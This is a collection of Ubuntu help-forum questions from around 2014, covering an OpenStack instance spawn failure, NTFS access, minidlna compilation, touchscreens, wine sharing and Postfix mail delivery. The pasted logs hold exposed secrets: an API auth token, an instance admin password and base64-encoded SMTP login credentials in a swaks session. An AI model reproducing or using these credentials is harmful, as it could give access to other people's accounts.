http connection ( 1 ) : nova.cloud.controller debug ( connectionpool:283 ) `` get /v1.1/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 http/1.1 '' 200 1349 resp : [ 200 ] { 'date ' : 'tue , 10 jun 2014 00:01:05 gmt ' , 'x-compute-request-id ' : 'req-d91d0858-7030-469d-8e55-40e05e4d00fd ' , 'content-type ' : 'application/json ' , 'content-length ' : '1349 ' } resp body : { `` server '' : { `` status '' : `` build '' , `` updated '' : `` 2014-06-10t00:01:05z '' , `` hostid '' : `` '' , `` os-ext-srv-attr : host '' : null , `` addresses '' : { } , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 '' , `` rel '' : `` self '' } , { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/servers/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 '' , `` rel '' : `` bookmark '' } ] , `` key_name '' : `` key2 '' , `` image '' : { `` id '' : `` 28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` rel '' : `` bookmark '' } ] } , `` os-ext-sts : task_state '' : `` scheduling '' , `` os-ext-sts : vm_state '' : `` building '' , `` os-ext-srv-attr : instance_name '' : `` instance-00000004 '' , `` os-ext-srv-attr : hypervisor_hostname '' : null , `` flavor '' : { `` id '' : `` 1 '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/flavors/1 '' , `` rel '' : `` bookmark '' } ] } , `` id '' : `` 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 '' , `` security_groups '' : [ { `` name '' : `` default '' } ] , `` os-ext-az : availability_zone '' : `` nova '' , `` user_id '' : `` b3730a52a32e40f0a9500440d1ef1c7d '' , `` name '' : `` cirros '' , `` created '' : `` 2014-06-10t00:01:04z '' , `` tenant_id '' : `` 08cff06d13b74492b780d9ceed699239 '' , `` os-dcf : diskconfig '' : `` manual '' , `` accessipv4 '' : `` '' , `` accessipv6 '' : `` '' , `` progress '' : 0 , `` os-ext-sts : power_state '' : 0 , `` config_drive '' : `` '' , `` metadata '' : { } } } req : curl -i http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/flavors/1 -x get -h `` x-auth-project-id : admin '' -h `` user-agent : python-novaclient '' -h `` accept : application/json '' -h `` x-auth-token : 3eefa1837d984426a633fe09259a1534 '' info ( connectionpool:191 ) starting new http connection ( 1 ) : nova.cloud.controller debug ( connectionpool:283 ) `` get /v1.1/08cff06d13b74492b780d9ceed699239/flavors/1 http/1.1 '' 200 418 resp : [ 200 ] { 'date ' : 'tue , 10 jun 2014 00:01:05 gmt ' , 'x-compute-request-id ' : 'req-896c0120-1102-4408-9e09-cd628f2dd699 ' , 'content-type ' : 'application/json ' , 'content-length ' : '418 ' } resp body : { `` flavor '' : { `` name '' : `` m1.tiny '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/flavors/1 '' , `` rel '' : `` self '' } , { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/flavors/1 '' , `` rel '' : `` bookmark '' } ] , `` ram '' : 512 , `` os-flv-disabled : disabled '' : false , `` vcpus '' : 1 , `` swap '' : `` '' , `` os-flavor-access : is_public '' : true , `` rxtx_factor '' : 1.0 , `` os-flv-ext-data : ephemeral '' : 0 , `` disk '' : 0 , `` id '' : `` 1 '' } } req : curl -i http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd -x get -h `` x-auth-project-id : admin '' -h `` user-agent : python-novaclient '' -h `` accept : application/json '' -h `` x-auth-token : 3eefa1837d984426a633fe09259a1534 '' info ( connectionpool:191 ) starting new http connection ( 1 ) : nova.cloud.controller debug ( connectionpool:283 ) `` get /v1.1/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd http/1.1 '' 200 719 resp : [ 200 ] { 'date ' : 'tue , 10 jun 2014 00:01:05 gmt ' , 'x-compute-request-id ' : 'req-454e9651-c247-4d31-8049-6b254de050ae ' , 'content-type ' : 'application/json ' , 'content-length ' : '719 ' } resp body : { `` image '' : { `` status '' : `` active '' , `` updated '' : `` 2014-06-09t22:17:54z '' , `` links '' : [ { `` href '' : `` http : //nova.cloud.controller:8774/v1.1/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` rel '' : `` self '' } , { `` href '' : `` http : //nova.cloud.controller:8774/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` rel '' : `` bookmark '' } , { `` href '' : `` http : //external.public.port:9292/08cff06d13b74492b780d9ceed699239/images/28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` type '' : `` application/vnd.openstack.image '' , `` rel '' : `` alternate '' } ] , `` id '' : `` 28bed1bc-bc1c-4533-beee-8e0428ad40dd '' , `` os-ext-img-size : size '' : 13147648 , `` name '' : `` cirros 0.3.1 '' , `` created '' : `` 2014-06-09t22:17:54z '' , `` mindisk '' : 0 , `` progress '' : 100 , `` minram '' : 0 , `` metadata '' : { } } } + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | property | value | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | os-ext-sts : task_state | scheduling | | image | cirros 0.3.1 | | os-ext-sts : vm_state | building | | os-ext-srv-attr : instance_name | instance-00000004 | | flavor | m1.tiny | | id | 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 | | security_groups | [ { u'name ' : u'default ' } ] | | user_id | b3730a52a32e40f0a9500440d1ef1c7d | | os-dcf : diskconfig | manual | | accessipv4 | | | accessipv6 | | | progress | 0 | | os-ext-sts : power_state | 0 | | os-ext-az : availability_zone | nova | | config_drive | | | status | build | | updated | 2014-06-10t00:01:05z | | hostid | | | os-ext-srv-attr : host | none | | key_name | key2 | | os-ext-srv-attr : hypervisor_hostname | none | | name | cirros | | adminpass | ofrbvrqif2c8 | | tenant_id | 08cff06d13b74492b780d9ceed699239 | | created | 2014-06-10t00:01:04z | | metadata | { } | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + ubuntu @ node7 : ~ $ ubuntu @ node7 : ~ $ nova list + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- + -- -- -- -- -- + | id | name | status | networks | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- + -- -- -- -- -- + | 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 | cirros | error | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- + -- -- -- -- -- + ubuntu @ node7 : ~ $ var/log/nova/nova-compute.log shows the following error : ... 2014-06-10 00:01:06.048 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] attempting claim : memory 512 mb , disk 0 gb , vcpus 1 2014-06-10 00:01:06.049 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] total memory : 3885 mb , used : 512 mb 2014-06-10 00:01:06.049 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] memory limit : 5827 mb , free : 5315 mb 2014-06-10 00:01:06.049 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] total disk : 146 gb , used : 0 gb 2014-06-10 00:01:06.050 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] disk limit not specified , defaulting to unlimited 2014-06-10 00:01:06.050 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] total cpu : 2 vcpus , used : 0 vcpus 2014-06-10 00:01:06.050 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] cpu limit not specified , defaulting to unlimited 2014-06-10 00:01:06.051 audit nova.compute.claims [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] claim successful 2014-06-10 00:01:06.963 warning nova.network.quantumv2.api [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] no network configured ! 2014-06-10 00:01:08.347 error nova.compute.manager [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] instance failed to spawn 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] traceback ( most recent call last ) : 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1118 , in _spawn 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] self._legacy_nw_info ( network_info ) , 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 703 , in _legacy_nw_info 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] network_info = network_info.legacy ( ) 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] attributeerror : 'list ' object has no attribute 'legacy' 2014-06-10 00:01:08.347 32223 trace nova.compute.manager [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] 2014-06-10 00:01:08.919 audit nova.compute.manager [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] terminating instance 2014-06-10 00:01:09.712 32223 error nova.virt.libvirt.driver [ - ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] during wait destroy , instance disappeared . 2014-06-10 00:01:09.718 info nova.virt.libvirt.firewall [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] attempted to unfilter instance which is not filtered 2014-06-10 00:01:09.719 info nova.virt.libvirt.driver [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] deleting instance files /var/lib/nova/instances/2eb5e3ad-3044-41c1-bbb7-10f398f83e43 2014-06-10 00:01:10.044 error nova.compute.manager [ req-41e53086-6454-4efb-bb35-a30dc2c780be b3730a52a32e40f0a9500440d1ef1c7d 08cff06d13b74492b780d9ceed699239 ] [ instance : 2eb5e3ad-3044-41c1-bbb7-10f398f83e43 ] error : [ 'traceback ( most recent call last ) : \n ' , ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 864 , in _run_instance\n set_access_ip=set_access_ip ) \n ' , ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1123 , in _spawn\n log.exception ( _ ( \'instance failed to spawn\ ' ) , instance=instance ) \n ' , ' file `` /usr/lib/python2.7/contextlib.py '' , line 24 , in __exit__\n self.gen.next ( ) \n ' , ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 1118 , in _spawn\n self._legacy_nw_info ( network_info ) , \n ' , ' file `` /usr/lib/python2.7/dist-packages/nova/compute/manager.py '' , line 703 , in _legacy_nw_info\n network_info = network_info.legacy ( ) \n ' , `` attributeerror : 'list ' object has no attribute 'legacy'\n '' ] 2014-06-10 00:01:40.951 32223 audit nova.compute.resource_tracker [ - ] auditing locally available compute resources 2014-06-10 00:01:41.072 32223 audit nova.compute.resource_tracker [ - ] free ram ( mb ) : 2861 2014-06-10 00:01:41.072 32223 audit nova.compute.resource_tracker [ - ] free disk ( gb ) : 146 2014-06-10 00:01:41.073 32223 audit nova.compute.resource_tracker [ - ] free vcpus : 1 2014-06-10 00:01:41.262 32223 info nova.compute.resource_tracker [ - ] compute_service record updated for node5 : node5.maas ... ca n't seem to find any entries in quantum.conf related to `` legacy '' . any help would be appreciated . cheers ,
481107	i ca n't access specific data from my hdd	re-edit 12/6/2014 i did what was proposed and now i can mount again the hdd . but there is a specific folder that has most of the data and this is why i set the question in the first place.the disk capacity is what it is supposed to be but this folder looks almost empty . the data inside was saved from windows vista and now they are invisible/without access . if a mount the hdd on windows it is ok but on ubuntu 12.04 is nothing . i ran the commands for ntfs and 3g but there was an error.maybe because the hdd was mounted.nevertheless , the format must be different . what can i do ? peace and love , panos
481108	configure : error : could not find libavformat - part of ffmpeg after installing libav from source and trying to compile minidlna	i tried to install minidlna on my machine but it appeared to me that it 's not in repositories anymore . well then i decided to compile it myself . after downloading version 1.1.3 i tried to compile but i needed libav headers which i could n't install via apt - no idea why there has been a lot of broken packages : $ sudo apt-get install libavcodec-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libavcodec-dev : depends : libavutil-dev ( = 6:9.13-0ubuntu0.14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . anyways i installed libav 9.13 from source and now i came to this point : $ ./configure ... checking for av_open_input_file in -lavformat ... no checking for avformat_open_input in -lavformat ... no checking for av_open_input_file in -lavformat ... no checking for avformat_open_input in -lavformat ... no configure : error : could not find libavformat - part of ffmpeg but i have installed that ! even in the install log i can see : ... install libavdevice/libavdevice.a install libavfilter/libavfilter.a install libavformat/libavformat.a install libavresample/libavresample.a install libavcodec/libavcodec.a install libswscale/libswscale.a install libavutil/libavutil.a install libavdevice/avdevice.h install libavdevice/version.h install libavdevice/libavdevice.pc install libavfilter/avfilter.h install libavfilter/avfiltergraph.h install libavfilter/buffersink.h install libavfilter/buffersrc.h install libavfilter/version.h install libavfilter/libavfilter.pc install libavformat/avformat.h ... . edit reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libavutil-dev : depends : libavutil52 ( = 6:9.13-0ubuntu0.14.04.1 ) but 7:2.2.1-2~trusty1 is to be installed e : unable to correct problems , you have held broken packages . edit $ apt-cache madison `` libavutil* '' libavutil-extra-52 | 6:9.13-0ubuntu0.14.04.1 | http : //archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages libavutil-extra-52 | 6:9.13-0ubuntu0.14.04.1 | http : //archive.ubuntu.com/ubuntu/ trusty-security/universe amd64 packages libavutil-extra-52 | 6:9.11-2ubuntu2 | http : //archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages libavutil-dev | 6:9.13-0ubuntu0.14.04.1 | http : //archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages libavutil-dev | 6:9.13-0ubuntu0.14.04.1 | http : //archive.ubuntu.com/ubuntu/ trusty-security/universe amd64 packages libavutil-dev | 6:9.11-2ubuntu2 | http : //archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages libavutil52 | 6:9.13-0ubuntu0.14.04.1 | http : //archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages libavutil52 | 6:9.13-0ubuntu0.14.04.1 | http : //archive.ubuntu.com/ubuntu/ trusty-security/universe amd64 packages libavutil52 | 6:9.11-2ubuntu2 | http : //archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages
481109	ubuntu identifying touch as mouse	i have ubuntu 14.04 lts installed in a sony vaio fit 14 . the problem is that whenever i try to use the touchscreen to scroll or click , it triggers the mouse pointer and takes no action but positioning the arrow in the area i touched . does anyone has the solution for this ?
481118	lubuntu not connect to internet after placing the static address	i 'm using lubuntu . ( /etc/network/interfaces ) to change the ip of my network card so all remaining static as follows auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.110 netmask 255.255.255.0 gateway 192.168.1.1 # router ip i have no connection to internet when i put the static address by dhcp while if i ?
481120	dell latitude d830 dvd drive not recognized	unlike some people who have issues with the video or wifi drivers , i suffer from not being able to use the dvd drive on this laptop . upon post , the bios sees it and i am able to open the tray as well ; however , once the system starts to load up ubuntu or other distros ( debian and linux mint ) , i lose all functionality . plus , i do n't see it listed as a device in the os . i 've poured over the internet the past few days trying to see if anyone else has the issue , or did and found a solution but sadly , nothing anywhere so far . so , i thought i would ask the community here and see what you all think . worse case scenario , i have some dead weight to a nice little machine . thanks ! ps i honestly think linux does n't like the ide interface the disc drive has .
481129	is my edubuntu disc amd64 or i386 ? ( 64 or 32 bit )	i have an edubuntu dvd . however , i do n't know if i burned it using the i386 ( 32 bit ) iso , or the amd64 ( 64 bit ) iso . is there anyway to check the dvd file system to see which one it is ? thanks
481132	is there a way to uninstall unity ?	i changed my desktop to lxde because iâm running ubuntu in a vm . i do n't want to download lubuntu and reinstall ( i think it will take too much time ) , so i simply want to uninstall ubuntu-desktop or unity .
481134	why does ubuntu 's webkit inspector look ( and work ) just like safari ?	in older ubuntu , the python-webkit inspector looked like chrome , as you can see in these screenshots : http : //stackoverflow.com/questions/13132459 ( it had some annoying bugs , too . ) i see midori 's inspector also looks just like safari , and still has some bugs . in the latest 14.04 's python-webkit embedded browser ( and also midori browser ) , the inspector actually looks just like safari - and also seems to still have bugs ( icons missing , problems selecting , etc. ) . is there a reason for this drastic change , or is it just a default configuration ? is there a recommended way to get the webkit-inspector fully working ? update i filed a bug report . the big problem with this is when you make a highly webkit-integrated project using python-gtk-webkit such as in this example . debugging within the webview is problematic . update i noticed the other day that midori actually freezes up completely , in the same case that safari does , where no other browser freezes . so it seems there 's more than just how the inspector looks , they must have taken the code from the safari-webkit branch ... but why ? it should be noted that midori on windows has an inspector like chrome , not safari , so it seems to be a bug in ubuntu 's gtk-webkit .
481138	how to change the sata mode from ahci to ide to install windows xp for dual boot ? ( ubuntu installed first )	good day guys , i just installed ubuntu and it replaced my current os windows 7 ultimate . now i want to go back to windows and try to install xp but now i 'm unable to install any version of windows because others says that it requires ide as controller . unfortunately , i ca n't change it in bios at startup.please help guys : (
481140	ubuntu 's partition not recognized ?	please make sure you read everything : most people post answers that are literally out of context , which is frustrating ! i am in big trouble right now . my ubuntu partition is not recognized and therefore can not be used . as a result , whenever my computer boots up , it shows a `` grub-rescue '' black screen , which is annoying . i am currently running a debian live dvd . i will neither re-insall anything nor format the ubuntu partition because i think this is a problem that can be resolved . what happened the moment before i get this grub-rescue screen ? i was working on ubuntu and decided to create a new partition for my data , labeled `` donnees '' ( french of `` data '' ) . this computer literally froze ... and after 30 minutes , i was very 'angry ' and i forced the shutdown of the computer ( since the mouse was n't moving ) . now , i ca n't access anything but every live cd and dvd i have created . unfortunately , i was running ubuntu 14.04 and i have a live dvd with 13.10 . so my question is : since i have approx . 150 gb of data on ubuntu that is currently unreadable , will i ( eventually ) be able to get my partition back ? or should i just sit in a corner and cry ? here are a couple of screenshots that will probably help , directly taken from my debian live dvd .
481145	getting hp envy touch display to work a bit better	currently i have an hp envy with a touchscreen running ubuntu . the touchscreen does work to some extent ( i can click most things and drag selection boxes on the desktop ) but it does n't seem to want to let me do anything involving clicking and dragging besides that , like highlighting text or moving windows or scroll bars . it also seems completely unwilling to let me click on small things , like the up/down buttons on either end of scroll bars , or the close/minimize/maximize buttons on windows . i do n't really mind if i ca n't scroll or use multi-finger gestures on this laptop the way i can on a tablet or phone , but i would like it if i could at least get the touchscreen working as well as a regular mouse or touchpad in terms of capability , and the complete inability to drag things or click small items is a bit of an issue on that score . thanks in advance for any help i can get here !
481148	wine : install windows program for multiple users	i 'm trying to install programs through wine so that it 's available to all users . reasons are obvious : save space and i do n't like the idea of doing separate multiple installations of a program for multiple users . one installation per machine should be sufficient . here 's what i 've done : ( 1 ) installing a program to my user account drops the program in [ /home/me/.wine/ ] . i made that program read/write/execute to all users . programs seem to work from another user account if he/she browses to my home folder , into ~/.wine/drive_c/program files ( x86 ) /the-program/program-executable.exe not ideal but workable . ( 2 ) i then moved my ~/.wine folder out of my home directory onto a shared partition and created a sym-link to it in my home folder and called it â.wineâ . i 've effectively replaced my .wine folder with a link to a .wine folder on a shared folder . it seems to work alright . my question : does anyone know a better way to do this ? my solution seems a bit crazy and a bit hacky . any smart people out there think this is a bad idea ?
481151	how can i add this usb printer ( `/dev/usb/lp0` ) to printer list when print command is given in any application ?	i have made a usb thermal printer which generates the /dev/usb/lp0 nod in /dev folder . printing using echo `` test printslip '' /dev/usb/lp0 works fine . i would also want to print from text editors using ctrl + p , which does n't work currently . how can i add this usb printer ( /dev/usb/lp0 ) to printer list when print command is given in any application ?
481152	downloading ubuntu onto a flash drive	so i have two flash drives in , one is running ubuntu as a live cd and i 'm using that to install ubuntu on the other . i 've gone through the download process , clicked on `` something else '' and now i have to partition my flash drive . i do n't know how to do this . what exactly do i do now ? thank you guys so much ! that link helped a lot , i 'm just not sure if i have quite the right amount of space partitioned to each thing ( i 'm using a 14gig flashdrive ) but i think i 'm close enough . does it matter if the colors that show how much space is is used are swapped with the ones in the link ?
481156	apache virtual host for nagios on ubuntu 14	i have just installed nagios on ubuntu 14 lts with apache , i am accessing the site through example.com/nagios3 , however i want to use a virtual host for access the nagios like nagios.example.com . what is the best way to do this ?
481157	how to receive e-mail on a vanity host ( fqdn )	this e-mail shows in my sent messages , but never arrives locally : thufir @ dur : ~ $ thufir @ dur : ~ $ thufir @ dur : ~ $ mail -f /home/thufir/maildir/ /home/thufir/maildir/ : 0 messages thufir @ dur : ~ $ thufir @ dur : ~ $ swaks -f hawat.thufir @ gmail.com -t thufir @ dur.bounceme.net -tls -s smtp.gmail.com:587 -a login -- body body : where is it ? username : hawat.thufir password : password === trying smtp.gmail.com:587 ... === connected to smtp.gmail.com . < - 220 mx.google.com esmtp lr3sm6987268pab.4 - gsmtp - > ehlo dur.bounceme.net < - 250-mx.google.com at your service , [ 96.55.205.166 ] < - 250-size 35882577 < - 250-8bitmime < - 250-starttls < - 250-enhancedstatuscodes < - 250 chunking - > starttls < - 220 2.0.0 ready to start tls === tls started with cipher tlsv1.2 : ecdhe-rsa-aes128-gcm-sha256:128 === tls no local certificate set === tls peer dn= '' /c=us/st=california/l=mountain view/o=google inc/cn=smtp.gmail.com '' ~ > ehlo dur.bounceme.net < ~ 250-mx.google.com at your service , [ 96.55.205.166 ] < ~ 250-size 35882577 < ~ 250-8bitmime < ~ 250-auth login plain xoauth xoauth2 plain-clienttoken < ~ 250-enhancedstatuscodes < ~ 250 chunking ~ > auth login < ~ 334 vxnlcm5hbwu6 ~ > agf3yxqudgh1zmly < ~ 334 ugfzc3dvcmq6 ~ > cmvkc3f1yxjlmtiz < ~ 235 2.7.0 accepted ~ > mail from : < hawat.thufir @ gmail.com > < ~ 250 2.1.0 ok lr3sm6987268pab.4 - gsmtp ~ > rcpt to : < thufir @ dur.bounceme.net > < ~ 250 2.1.5 ok lr3sm6987268pab.4 - gsmtp ~ > data < ~ 354 go ahead lr3sm6987268pab.4 - gsmtp ~ > date : mon , 09 jun 2014 22:01:45 -0700 ~ > to : thufir @ dur.bounceme.net ~ > from : hawat.thufir @ gmail.com ~ > subject : test mon , 09 jun 2014 22:01:45 -0700 ~ > x-mailer : swaks v20130209.0 jetmore.org/john/code/swaks/ ~ > ~ > where is it ? ~ > ~ > . < ~ 250 2.0.0 ok 1402376515 lr3sm6987268pab.4 - gsmtp ~ > quit < ~ 221 2.0.0 closing connection lr3sm6987268pab.4 - gsmtp === connection closed with remote host . thufir @ dur : ~ $ thufir @ dur : ~ $ mail -f /home/thufir/maildir/ /home/thufir/maildir/ : 0 messages thufir @ dur : ~ $ while this e-mail gets through fine ( well , only `` sending '' locally on this computer to this computer ) : thufir @ dur : ~ $ thufir @ dur : ~ $ mail -f /home/thufir/maildir/ /home/thufir/maildir/ : 0 messages thufir @ dur : ~ $ thufir @ dur : ~ $ swaks -f thufir @ dur.bounceme.net -t thufir @ dur.bounceme.net === trying dur.bounceme.net:25 ... === connected to dur.bounceme.net . < - 220 dur.bounceme.net esmtp postfix ( ubuntu ) - > ehlo dur.bounceme.net < - 250-dur.bounceme.net < - 250-pipelining < - 250-size 10240000 < - 250-vrfy < - 250-etrn < - 250-starttls < - 250-enhancedstatuscodes < - 250-8bitmime < - 250 dsn - > mail from : < thufir @ dur.bounceme.net > < - 250 2.1.0 ok - > rcpt to : < thufir @ dur.bounceme.net > < - 250 2.1.5 ok - > data < - 354 end data with < cr > < lf > . < cr > < lf > - > date : mon , 09 jun 2014 22:02:19 -0700 - > to : thufir @ dur.bounceme.net - > from : thufir @ dur.bounceme.net - > subject : test mon , 09 jun 2014 22:02:19 -0700 - > x-mailer : swaks v20130209.0 jetmore.org/john/code/swaks/ - > - > this is a test mailing - > - > . < - 250 2.0.0 ok : queued as 90cc1221a6f - > quit < - 221 2.0.0 bye === connection closed with remote host . thufir @ dur : ~ $ thufir @ dur : ~ $ mail -f /home/thufir/maildir/ '' /home/thufir/maildir/ '' : 1 message 1 new > n 1 thufir @ dur.bouncem 15/588 test mon , 09 jun 2014 22:02:19 -0700 ? 1 return-path : < thufir @ dur.bounceme.net > x-original-to : thufir @ dur.bounceme.net delivered-to : thufir @ dur.bounceme.net received : from dur.bounceme.net ( dur.bounceme.net [ 127.0.0.1 ] ) by dur.bounceme.net ( postfix ) with esmtp id 90cc1221a6f for < thufir @ dur.bounceme.net > ; mon , 9 jun 2014 22:02:19 -0700 ( pdt ) date : mon , 09 jun 2014 22:02:19 -0700 to : thufir @ dur.bounceme.net from : thufir @ dur.bounceme.net subject : test mon , 09 jun 2014 22:02:19 -0700 x-mailer : swaks v20130209.0 jetmore.org/john/code/swaks/ message-id : < 20140610050219.90cc1221a6f @ dur.bounceme.net > this is a test mailing new mail has arrived . ? q held 1 message in /home/thufir/maildir/ thufir @ dur : ~ $ thufir @ dur : ~ $ as near as i can tell the mail should be routed to this ip address and fqdn correctly : thufir @ dur : ~ $ thufir @ dur : ~ $ dig dur.bounceme.net ; < < > > dig 9.9.5-3-ubuntu < < > > dur.bounceme.net ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 54376 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 0 , additional : 0 ; ; question section : ; dur.bounceme.net . in a ; ; answer section : dur.bounceme.net . 16 in a 96.55.205.166 ; ; query time : 22 msec ; ; server : 127.0.1.1 # 53 ( 127.0.1.1 ) ; ; when : mon jun 09 22:09:00 pdt 2014 ; ; msg size rcvd : 50 thufir @ dur : ~ $ thufir @ dur : ~ $ nslookup dur.bounceme.net server : 127.0.1.1 address : 127.0.1.1 # 53 non-authoritative answer : name : dur.bounceme.net address : 96.55.205.166 thufir @ dur : ~ $ is this due to tls the mail stack trusty uses out of the box ( none ) ? the tls documentation is a bit daunting . just follow the postfix quick and dirty guide , or the ubuntu guide ? tls is absolutely required ? the isp blocks various e-mail ports , such as 25 . while i have n't receive a bounce per se , i have received : delivery to the following recipient has been delayed : thufir @ dur.bounceme.net message will be retried for 2 more day ( s ) in my gmail account .
